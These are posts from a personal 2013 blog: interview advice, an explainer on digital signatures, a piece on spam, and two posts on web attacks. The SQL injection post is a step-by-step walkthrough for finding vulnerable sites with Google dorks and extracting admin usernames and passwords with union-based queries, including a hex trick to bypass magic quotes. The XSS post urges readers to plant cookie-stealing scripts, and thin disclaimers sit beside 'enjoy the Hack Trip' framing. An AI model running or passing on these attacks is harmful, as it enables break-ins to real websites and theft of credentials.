Saturday, 23 March 2013

Interview Question

                
         
TYPICAL QUESTIONS THAT AN INTERVIEWER WOULD ASK


After attending my first Interview with HP here I'm sharing the frequently asked Interview questions, that will revel about your self so have a look at this post if this is your first Interview as you may face the same experience as me...!!!

* Group Discussion or Aptitude Tests are the elimination rounds in today's trend.., Ok let me begin the topic now,

1.Tell me about yourself
The most often asked question in interviews. You need to have a short statement prepared in your mind. Be careful that it does not sound rehearsed. Limit it to work/Study-related items unless instructed otherwise. Talk about things you have done well at your college and how you wanted to perform in the first job, engage yourself at least for 2minute and if you can go on till the interrupts you.

2. Why Should We Employ You? or Why Should I Hire you?
For this question, your answer should list out strengths that you feel are relevant to the job. Given below are some answers which could help you with your answers. However, structure them to suit your requirements.

Good analytical skills
I am a good team player
I have good entrepreneurial skills
Can say “no” to people when required to do so!

I have consistently met my deadlines and targetsMy greatest asset is my ability to motivate people
Even during emergencies, I do not loose my cool


I can persuade people to see my point of view, and get the work done
I am very co-operative with my sub-ordinates, and would like to see them grow
I am very flexible, and have the ability to work hard under difficult work conditions

3. Do You Have Offers From Other Companies ?

This is of course a difficult question to answer. Obviously, you must have applied to other companies if you are looking for a job or would have some offers from other companies already. Therefore, do not lie that you have not. However, you are on thin ice here! The interviewer could be checking your honesty. On the other hand, he/she may also be trying to find out how focused you are - are you applying randomly, or is there a well-planned strategy?
Whatever your answer, it should match your career goals. But don't worry this question is asked by very lest Interviewers...

4. What Salary Are You Expecting?
Try not to get into salary details early in the interview. If pressed, you could say that it all depends on the job, and would like to talk about it after a job offer. Say this in a convincing tone. In case you are asked this question in your latter interviews, give a direct answer. Do not sound apologetic while quoting the figure you have in mind, BE AWARE as most of the freshers don't know there value and gets hired to less salary then the actually deserves and some candidates are sent back as they expects more salary even though they don't deserve for that.

SALARY EXPECTATIONS :

a. How much do you expect?
If you have done your homework, you would know how much other people in similar jobs are paid. Quote the range upfront.

b. How much do you think you are worth?
Work out how much you should be paid, given the market value of the job and your skills. If you can bring some extra skills to the table, do not hesitate to ask for more than the market value.

c. What kind of a culture are you comfortable with?
It is better to be frank about your preferences. Your interviewer will get a clear idea about your expectations.

d. Which is more important to you-salary, perks or growth opportunities?
This one will reveal the real you. So be sure what you are going to say. Above all, be true to yourself. If you think this is a negotiation move, then say clearly that you will never sell yourself short.


5. What do you know about our company?
Do not give your opinions about the company. Stick to reported facts that you have gathered from newspapers and so on. Talk about the product portfolio, size, income, and market perceptions of the company. Also it is better to refer details about each company before going for the interview from Wikipedia or Google too.

6. Why should we choose you over someone else?
Talk clearly about problems that you have solved in your College/Project Team and highlight the quality required and convince them the you are the one...

7. Your qualifications are excellent, but you may be overqualified for the position we have to offer?
Point out that more experience can never be a drawback. If you are multi-skilled, then highlight the fact that a company on the fast-track needs multi-skilled people. It needs people within different departments to work together. Also emphasise that the company's future growth will be an exponential function of your experience.

QUESTIONS YOU SHOULD ASK :

Interviewers usually round off by giving you an opportunity to ask questions. Treat it like a welcome opportunity.
You could ask questions like.
a) Tell me about your company.
b) Now that I have outlined my career goals, do you think you can offer me the opportunities I need?
c) What kind of training and learning can I expect in your company?
d) Describe the work culture and the management style of your company?
e) What is the long-term vision of your company?

As a fresher, current position and status can impact the way you are interviewed. Fresh Out of College

The basis on which you will be judged is your academic background, family background, and interests.
If looking for your first job, ensure that your previous experience, even if it is part-time, is noticed.
Mention projects or responsibilities you may have undertaken. This will indicate your area of aptitude.
You should be willing to put in regular hours, in line with the company's policies. The interviewer needs to know whether you can be punctual and put in full-time work.
In case you have applied for the post of management trainee, you should display an ability to adapt, and indicate all-round interests. Moreover, you should have good interpersonal skills.
You should be enthusiastic to learn, and show commitment towards the organization, as the company will be spending a lot on your training.

Bring with you :
a) Copies of your resumes
b) References and letters of recommendations.
c) Recent Photos. 
d) Some blank sheets, may be helpful to solve some problems

First Impressions :
There is a common saying that minds are made up within the first 5 minutes of an interview. So keep in mind these important first impression indicators. Walk in the door as if you already work there, carry yourself as though you feel perfectly comfortable with the situation. Arrive on time or a little early. In the waiting area, politely tell the receptionist who you are meeting and in a friendly way, ask where you should sit. Take slow, deep breaths to help you remain calm and focused. When introduced to the interviewer, have a firm, but not painful, handshake. Smile. Have good posture when sitting or standing. Introduce yourself in a relaxed, confident manner. Have a well-groomed, professional appearance. Project a feeling of confidence. Bring extra copies of your resume, some thing to write on and something to write with. Don't forget to make friends as this makes you feel comfort and make you fell better...!!!
   

Monday, 18 February 2013

What is a Digital Signature




After talking about the Basic Cryptography its the time to learn about the Digital signatures...!!!

A Digital Signature Certificate, like hand written signature, establishes the identity of the sender filing the documents through internet which sender can not revoke or deny. Accordingly, Digital Signature Certificate is a digital equivalent of a hand written signature which has an extra data attached electronically to any message or a document.
Digital Signature also ensures that no alterations are made to the data once the document has been digitally signed. A DSC is normally valid for 1 or 3 years, after which it can be renewed
A Digital Signature is a method of verifying the authenticity of an electronic document.


What is a Digital Signature Certificate...?

Digital signature certificates (DSC) are the digital equivalent (that is electronic format) of physical or paper certificates. Examples of physical certificates are drivers' licenses, passports or membership cards. Certificates serve as a proof of identity of an individual for a certain purpose; for example a driver's license identifies someone who can legally drive in a particular country. Likewise, a digital certificate can be presented electronically to prove your identity, to access information or services on the Internet or to sign certain documents digitally, properly implemented digital signatures are more difficult to forge than the handwritten type.

To digitally sign a document, you must have a digital ID. This unique identifier can obtained from various Certification Authorities on the Web, such as VeriSign and EchoSign. Once you have a digital ID, you can add register it with programs that support digital signatures, such as Adobe Acrobat and Microsoft Outlook. Then you can use the program's "Sign" feature to add your digital signature to documents.
The digital signature is simply a small block of data that is attached to documents you sign. It is generated from your digital ID, which includes both a private and public key. The private key is used to apply the signature to the document, while the public key is sent with the file. The public key contains encrypted code, also called a "hash," that verifies your identity.
Digital signatures can be used to certify or approve documents. Certifying signatures verify the document's creator and show that the document has not been altered since it was signed. Therefore, only the original creator of a document can add a certifying signature. Approval signatures can be added by anyone with a digital ID and are used to approve documents, track changes, and accept terms stated with a document.

                                                         Digitally Signed Word Document

            So if a document is once digitally signed then its difficult to tamper it by others...!
A digital signature scheme typically consists of three algorithms:
  • A key generation algorithm that selects a private key uniformly at random from a set of possible private keys. The algorithm outputs the private key and a corresponding public key.
  • A signing algorithm that, given a message and a private key, produces a signature.
  • A signature verifying algorithm that, given a message, public key and a signature, either accepts or rejects the message's claim to authenticity.
Two main properties are required. First, a signature generated from a fixed message and fixed private key should verify the authenticity of that message by using the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party who does not possess the private key.


How Digital Signatures works...?

 Assume you were going to send the draft of a certain contract to your client in another town. You want to give your client the assurance that it was unchanged from what you sent and that it is really from you. Here then would be the process:
1. You copy-and-paste the contract (it’s a short one!) into an e-mail note.
2. Using special software, you obtain a message hash (mathematical summary) of the contract.
3. You then use a private key that you have previously obtained from a public-private key authority to encrypt the hash.
4. The encrypted hash becomes your digital signature of the message. (Note that it will be different each time you send a message.)

The disadvantages of using digital signatures involve the primary avenue for any business: money. This is because the business may have to spend more money than usual to work with digital signatures including buying certificates from certification authorities and getting the verification software..., any how nothing in this world is for free.... :)

Types of Digital Signatures :

Class 1: The use of digital ID’s for secure email enables the user to digitally sign and encrypt digital communication. The best way to secure and validate your email address is by using Class I Digital Signature. The recipient of the email will know that the content was kept confidential during transmission.

Class 2: Safe Solutions provides LRA (Local Registration Authority) for commencement of service, Class 2 certificate from the IT Department and ROC department. The Class 2 Digital certificates are electronic files that are used to identify people and resources over networks such as the internet.

Class 3: Class 3 Digital Signature recognizes people and resources over network and ensures encrypted communication between two parties. Safe Solutions provides LRA (Local Registration Authority) for commencement of service. The class 3 Digital Signature certificate recognizes people at E- procurement, E-Tender & E-actions.
The list of licensed CAs along with their contact information is available on the MCA porta...
Earn In US $     Make money     Paisa Live     Blog search
 
    Add to Google     Technology Blogs

Sunday, 17 February 2013

What is Spam


After reviewing my post  Backtracking Emails I felt that I had missed to say something about Spams.., so here I'll be talking completely about spams, how it is made, why it is made and how to avoid it...!!!


Spam involving nearly identical messages sent to numerous recipients by email. Clicking on links in spam email may send users to phishing web sites or sites that are hosting malware. Spam email may also include malware as scripts or other executable file attachments. Definitions of spam usually include the aspects that email is unsolicited and sent in bulk.


How do they get my Email Id
Spammers collect email addresses from chatrooms, websites, customer lists, newsgroups, and viruses which harvest users' address books, and are sold to other spammers. They also use a practice known as "email appending" or "epending" in which they use known information about their target (such as a postal address) to search for the target's email address. Much of spam is sent to invalid email addresses. Spam averages 78% of all email sent. According to the Message Anti-Abuse Working Group, the amount of spam email was between 88–92% of email messages sent in the first half of 2010...!!!


How do they Spam

a. Appending: Similar to a telephone directory, here One will have the list of Name, Email Id and many more personal information's of clients. A spammer will get those details officially or unofficially...!!!

b. Image spam: This is one of the serious issue where texts and messages are stored in the attractive(erotic/beautiful/pornographic ) images and those images are uploaded to the popular websites, the one who clicks on it will be exploited by spammer as he can steal the host cookie..!!!

c. Blank spam: Blank spam is spam without any payload advertisements, but still it fits the definition of spam because of its nature as bulk and unsolicited email...!!!

 

 So what are the effects of Spam

 a. Every time a "spammer" sends out email spam, the entire Internet community has to bear the cost,  in particular the recipients and the ISPs at the receiving end. It wasted a lot of recipients' time and disk space... :(

b. Spam also ties up bandwidth and resources on computers and routers all over the Internet. Every unwanted email message adds to the total cost of operating the networks of computers which form the Internet. Spam can disrupt a network by crashing mail servers and filling up hard drives. Spam also constitutes an invasion of Internet users' online privacy... :(

c. On the other hand, if any servers or organizations / institutes being classified as SPAM sites, others may not be able to receive normal emails from these sites... :(

 

 So what can I do to avoid Spam...?

a. Never ever Sign Up on Un-Known websites and never share your Email Id to Anonymous...

b. Avoid clicking the links that are in the email you receive if the sender is an anonymous...

c. It is common sense that no one today will ask your help by Introducing themselves as XYZ working in ABC with income of several $ as post photos through email and asks your personal details or may call you to meet her/him...!

d. Here is how to take revenge against these bloody mother fuckers, through Report Spam, i.e before you delete your spam, forward your spam to: spam@uce.gov as this is the Spam box for FTC (Federal Trade Commission). Mail sent to this box is investigated. If it is indeed spam, the original sender can be charged $500 per email. The more mail they get from different users but same spammer, the more it's likely to be investigated. 

 Be aware of attractive, erotic, pornographic images that will reach any of your mail boxes and never forget these words before clicking on them...!!!

Do you love experiments so here is my journey in finding a spammer by Backtracking the senders Email, and never forget to stay Anonymous on Web    

Earn In US $       Like us on Facebook     Make money     Paisa Live    Blog search

Add to GoogleTechnology Blogs 



Sunday, 27 January 2013

XSS Attack

When I saw the comment posted by an Anonymous in my previous article SQL Injection, I taught yes I should talk about another injection attack called Cross Site Scripting Attack or the XSS or the HTML Injection attack...! But I once again say that I'm not a hacker and I'm not responsible If some one miss uses the contents of my Blog.
 Before coming to the topic my words to the one  who loves hacking, "Please note no hacker says that he is a hacker and givers out the clues related to his works...!" yes it is concerned with that Anonymous, who described himself as a Grey Hat hacker.


Cross-site scripting (XSS) or the Markup injection is a type of computer security vulnerability typically found in Web applications. Due to breaches of browser security, XSS enables attackers to inject client-side script (including ActiveX, Java, VBScript, Flash, or even HTML scripts) into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007


"Cross-site scripting (XSS) Markup injection is an attack where the attacker inserts malicious client-side code into the targeted webpages."


Types of XSS attacks:

i. Non-persistent
The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.
Here is the example for  XSS Vulnerability.

ii. Persistent
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.
As Persistent attack is very dangerous and against the cyber law of my Nation I can't give any examples for that..., SORRY





                   What a hacker can do...?


i. Thanks to Cross-Site Scripting vulnerabilities, a hacker can use this method to recover data exchanged between the user and the website concerned. The code injected in the web page can be used to display a form to fool the user and get him to enter authentication information, for example.

ii. Moreover, the injected script may redirect the user to a web page controlled by the hacker and possibly featuring the same graphic interface as the compromised site in order to fool the user.

iii. In such a context, the trust-based relationship that existed between the user and the website is fully compromised.
 

              How to avoid...?

Users can protect themselves against XSS attacks by configuring their browsers to prevent the execution of script languages. In reality, this solution is often much too restrictive for the user since many sites refuse to run correctly when there is no possibility of dynamic code execution.

note: Internet Explorer automatically blocks the execution of script languages.

The only viable solution for preventing Cross-Site Scripting attacks is to design non-vulnerable websites. To do so, the designer of a website should:

    * Verify the format of data entered by users;
    * Encode displayed user data by replacing special characters with their HTML equivalents.

The term "sanitation" refers to all actions that help make data entered by a user secure.

Here is a small example of XSS Vulnerability as suggested by my friend plz do check it out....
and later don't forget to remove the script after ? symbol in the addressbar and check out the real webpage...! 

Quick Get Started to Exploit XSS Vulnerability for fun, as hacking is  just a game to me and I'm not a hacker...!

Step 1: Finding Vulnerable Website:
  You can use Google Dork to find out the target or can use trial and error method
   simply type inurl:.php?id=  in google    

Step 2 : Testing  Vulnerability in the Website:

Type i.

 Once we found the input field, let us try to put some string inside the field, for instance let me    input a html tag like,
 <img src="http://blog.twinbytes.ca/wp-content/uploads/2012/11/wordpress-hacked.jpg" />.
 If it will display the image on the web page then you can F**K it...!

 Type ii.           
  The best way is you can directly insert the Client side scripting codes in the address bar directly...!

Step 3 : Enjoy the visit:
So once you have found the vulnerability you can insert the Cookie steel codes, to steel the sessions details of a victim visiting the site or you can permanently redirect the clients to other websites or you can also make the website unavailable by inserting infinite loop alert on the page load...!

"Never make use of someones weakness.., be a cyber warrior by helping in resolving the Vulnerability..."

Never forget a true hacker always follow the rule of  Anonymity on Web...!

Thursday, 17 January 2013

SQL Injection


If you are crazy about hacking here I'm going to tell you about a simplest hacking procedure called The SQL Injection...
  SQL injection is a technique that is applied by giving malicious inputs, that result in allowing the hacker to access over the database of the Host, in case if the database operations of that web sites is allowed directly...!

"SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks".

So what you need to do that...?

You need to find vulnerable sites manually by using some Google Droks


Checking for vulnerability:



Step1:
 In order to check if a site is vulnerable to SQL injection, just put a ' in the end of the url like this:

http://www.examplesite.com/index.php?id=5'
If the site shows you an error it is vulnerable to SQL, lets say we found a vulnerable site.

You may get Like this on the webpage:

Warning: mssql_execute(): message: Error converting data type varchar to int. (severity 16) in /var/www/html/includes/dbconnect.class.php on line 59

In order to successfully extract information from the database we need to do a few things, so it might be a good idea to open a text document so you can write stuff down. 



Step2:
 First we need to find out how many columns there is in the database. To do so we will use this query (a trial and error method):

http://www.examplesite.com/index.php?id=5 order by 1--

And we will keep increasing the number until we get an error.

http://www.examplesite.com/index.php?id=5 order by 5--
http://www.examplesite.com/index.php?id=5 order by 10--
Lets say there is 10 columns in the database.



Step3:
 Now we need to find out which columns that are vulnerable to SQL injection. To do so we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,3,4,5,6,7,8,9,10--

Notice that I have put a single - in front of the id number (id=-5)
Since there is no page with the id -5 it simply put just clears the sites text for us. That makes it easier for us to find the data that we are looking for.
Okay lets say the numbers 3, 6 and 9 popped up on the site, as vulnerable columns.



Step4:
 Now we wanna find the version of the database. To do so we will use this query (in either 1 of the vulnerable tables but i chose 3 for this example)

http://www.examplesite.com/index.php?id=-5 union select 1,2,@@version,4,5,6,7,8,9,10--
And if that doesn't work then try this 1:
http://www.examplesite.com/index.php?id=-5 union select 1,2,version(),4,5,6,7,8,9,10--





Step5:
 Now we want to get the name of the database for later usage, to do so we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()),4,5,6,7,8,9,10--

Write that name down so you wont forget it. Lets say the database name i just extracted was named exampledatabase
If the version is 4 or below, it is probably best that you just move on to another site since you are gonna have to brute force the tables for information (which isn't a very good idea for starters like us )



Step6:
If the version is 5 or above then we will use this query to show all the tables:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--


You don't have to group concatenate the output here. These queries would work as well

http://www.examplesite.com/index.php?id=-5 union select 1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
http://www.examplesite.com/index.php?id=-5 union select 1,2,table_name,4,5,6,7,8,9,10 from information_schema.tables where table_schema=database()--
Now you have the table names! 


Now you need to look at those tables and see if you can spot some tables we know has good information in it, tables such as:
User(s)
Admin(s)
tbluser(s) / tbl_user(s)
tbladmin(s) / tbl_admin(s)
Of course the admin might not have given the table such an obvious name so you might have to look around about it.




Step7:
 Once you have found the table you think has the information you want, we will use this query (In this example i use admin):

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name="admin"--

If the site shows you an error now don't panic! All that means is that Magic Quotes is turned on. To bypass this we need to convert the text "admin" into hex.

To do this:
Copy the name of the table you are trying to access, visit the site
Text to Hex, paste the name into the website where it says "Say Hello To My Little Friend". Click Convert copy the hex into your query like this.

http://www.examplesite.com/index.php?id=-5 union select 1,2,column_name,4,5,6,7,8,9,10 from information_schema.columns where table_name=0x61646d696e--

Notice the 0x before the hex string. This is to tell the server that the next part is a hex string.
You should now see all the columns inside the table.



Step8:
 Now, once again you will have to spot the columns we wanna see the contents of (although it is hopefully easier this time)
Lets say there are 2 columns called username and password. In order to see what are inside of those columns we will use this query:

http://www.examplesite.com/index.php?id=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 from exampledatabase.admin--

this is where we needed the database name. Btw the 0x3a means colon ( : )

Now you have the admin login!

If it is decrypted, try to run it through some online md5 'decrypters' or use my free cracked


And now we have to find the admin login, to do so, once again you can use
Google Droks to search for it manually

example :

inurl:adminlogin.php
inurl:admin.aspx
etc etc. 


and now check out for the Administrators Login and enjoy the Hack Trip...!


 Hi but be aware of log files of the websites as they always track your actions and I'm not responsible in case you are in trouble..., as this is just a game and always maintain Anonymity on Web

"Never make use of someones weakness.., be a cyber warrior by helping in resolving the Vulnerability..."

Featured post

Common Errors in English

Although English is a foreign language yet its important to learn in our country, If you needs to survive just out of your state now En...